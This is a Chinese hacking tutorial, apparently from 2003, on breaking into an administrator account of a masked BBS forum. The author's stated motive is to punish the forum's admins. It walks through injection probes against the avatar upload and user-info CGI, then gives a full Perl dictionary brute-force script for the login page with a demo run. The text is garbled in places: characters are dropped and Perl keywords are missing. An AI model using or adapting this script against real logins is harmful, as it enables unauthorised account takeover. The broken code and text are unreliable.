、开篇
今天闲着无聊到本地区个社区上转转那些人污言秽语有个帖子还侵犯了个朋友版权跟贴说了那人几句管理员也不管实在看不下去了打算给管理员盆冷水清醒清醒

2、准备/分析
安全第先开个HTTP代理打开社区登陆页面看到上面显示URL是http://www.****bbs.com/login.cgi
打开页面源代码找到登陆关键几句:
<form action="login.cgi" method="post">
<input type="hidden" name="menu" value="login">
<input type="hidden" name="id" value="">
用户名:<input size="25" name="username" ="i06">
密　码:<input type="password" size="25" value name="userpsd" ="i06">
</form>
所以提交登陆信息URL应该是http://wwww.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=

习惯先查看用户信息般情况下用户名和密码都是紧连着保存在起在这里我们更容易接近我们想要信息提交如下URL查看silkroad用户信息:
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad
返回正常用户信息

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad
同样返回正常用户信息看来.和/已经被过滤掉了

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad%00
提示此用户没有被注册 :(

扫描看看有FTP弱口令~可惜是anonymous价值不大

回到CGI上只在http://www.****bbs.com/rank.cgi这上面发现用是YuziBBS3000下面也可以下载BBS3000分析源代码但比较费时间我们先到几处敏感地方看看
http://www.****bbs.com/photo.cgi可以上传头像
由于头像显示是<img src=***></img>
关键就在***这里即图片连接
在要上传头像输入栏中填入</img>qq~;open F,">the0crat.txt";<img src=>.g试试提交没有任何提示也没对图片进行任何改变

换个角度来看既不分析源代码也不入侵目标服务器那么还是来试试探测探测社区管理员密码难说我今天运气比较好 :)
当然社区上管理员也不会是白痴不会设个空密码等你去玩提到探测论坛ID密码大家首先想到是什么？下载个又大又没趣黑客软件Software来挂个字典？难道就没有点想要自己动手写个脚本来破密码冲动？嘿嘿现在就教你自己动手步步来对密码进行探测  :)

密码探测般思路方法是
     ①取得预进行猜测密码列表
                 |
                 |
                 |
      ②向目标依次提交密码       <---------
                 |                        |
                 |                        |
                 |                        |
③根据目标响应判断密码是否正确         |
           |           |                  |
           |           |                  |
           |           |                  |
        密码正确    密码              |
           |           |                  |
           |           |                  |
           |           |                  |
     返回给用户密码   Next-----------------

第 3步要绕个圈子其他几步用就能很简单实现
所以先从第 3步开始:
我不了解别那些是如何进行判断估计是先取得成功登陆和密码两个页面代码然后对比它们区别点可能还有别办法可我还没想到~~~:)
所以首先注册个ID帐号asdfasdf密码asdfasdf根据前面取得信息此ID提交URL为http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id="username="这后面是用户ID"userpsd="这后面是用户密码然后登出社区
现在用telnet去取得我们想要信息:

F:\>nc -vv www.****bbs.com 80               <<<-----用nc连接目标WEB服务端口别说你不知道nc是什么嘿嘿
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA

www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter>          <<<-------这里用到前面提到提交用户登陆信息URL但用是密码
host:iis-server <Enter><Enter>

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html

fe7                                 <<<------------注意这个
<html>
<head>
<meta http-equiv=Content-Type content=text/html; char=gb2312>
<link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico>
......

这个是非成功登陆后返回信息
再来:

F:\>nc -vv www.****bbs.com 80
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA

www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1       <<<-------这次用是正确密码
host:iis-server

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html

18d                 <<<------------注意这个
<html><head><meta http-equiv=Content-Type content=text/html; char=gb2312>
<SCRIPT>
expireDate= Date;
expireDate.Year(expireDate.getYear+1);
......

这个是成功登陆后返回信息

返回信息第 7行"fe7"和"18d"区别我们就从这里下手

现在到社区管理团队(Team)上看看管理员ID其中个管理员ID是“秘密”

3、代码/代码解析
思路(步骤):
取得IP ---> 打开字典字典里每行个密码 ---> ---> connect ---> 向目标主机WEB端口提交数据此数据中所提交密码用个变量来代替这个变量就是字典里密码 ---> 将返回信息保存用先前提到登陆成功/失败返回信息区别点进行对比判断是否登陆成功即密码是否正确 ---> [ 当前密码正确--->输出正确密码并退出; 当前密码--->从第 2步骤开始重复直到密码正确或试完字典里所有密码 ]

#!/usr/bin/perl
#################################
#Password Cracker
#Author:HBU-the0crat
#E-mail:[email protected]
#Date:2003/8/18
#################################

use Socket;   #使用Socket模块

my $ARGC=@ARGV;   #取得参数数量
($ARGC!=1){pr "\nPassword Cracker Tool By HBU-the0crat\nUsage:$0 TargetIP\n";exit;}

my $host=sht;   #获取主机IP
pr "\nSending...";

open(FH,"<dic.dic");    #挂字典

while(<FH>)   #读取字典
{
chomp;
my $pwd=$_;
my $req="GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=$pwd&menu=login&id= HTTP/1.1\n"."host:iis-server\n\n";   #提交信息

my @res=sendraw($req);   #将目标服务器返回信息保存为

($res[6]=~/fe7/g)  #从@res中取得所返回信息第7行并进行判断判断依据:前文中用telnet所获知用来判断密码是否正确
{pr "\npwd:$pwd error";}   #如果返回信息中第7行中包含fe7这 3个则在屏幕上打印出密码信息

{
pr "\npwd:$pwd passed";   #成功登陆后返回信息中第7行不包含fe7这 3个所以如果第7行中不包含fe7这 3个就表示登陆成功即密码正确
close(FH);
exit;   #探测到正确密码立刻退出
}

}   #对比判断是否登陆成功循环
close(FH);

sub sendraw {
my ($req2) = @_;
my $target;
$target = inet_aton($host) or die "\ninet_aton problems";   #转换目标IP
(Handle,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) or die "\nSocket problems\n";   #Socket
(connect(Handle,pack "SnA4x8",2,80,$target)){   #此例中为80端口根据实际情况更改
select(Handle);
$| = 1;
pr $req2;   #向目标服务器提交登陆资料
my @res2 = <Handle>;   #取得目标服务器返回信息
select(STDOUT);
close(Handle);
@res2;   #将目标服务器返回信息作为sendraw返回值
}
{
die("\nCan't connect to $host:80...\n");
}
}

4、演示
dic.dic内容如下:
asdf
asdfasdf
asdfa
运行这个脚本(win2k+activeperl5.6下通过)
C:\>cracker.pl www.****bbs.com

Sending...
pwd:asdf error
pwd:asdfasdf passed

探测到正确密码后退出...:)

注意要根据实际情况更改提交信息和判断依据以及WEB端口

挂个字典就可以慢慢等密码出来了然而更多时候是取决于你运气

5、整理总结
弊:这段代码用是单线程所以在探测速度上不是很理想有兴趣可以去改改在没有使用跳板情况下对自己不安全而且成功率很大程度上取决于你运气
利:这种思路方法比较有效, 但也是比较没有效率密码破解方式

上篇文章: Format String 漏洞介绍/整理总结()

下篇文章: 有关数据库简单入侵和无赖破坏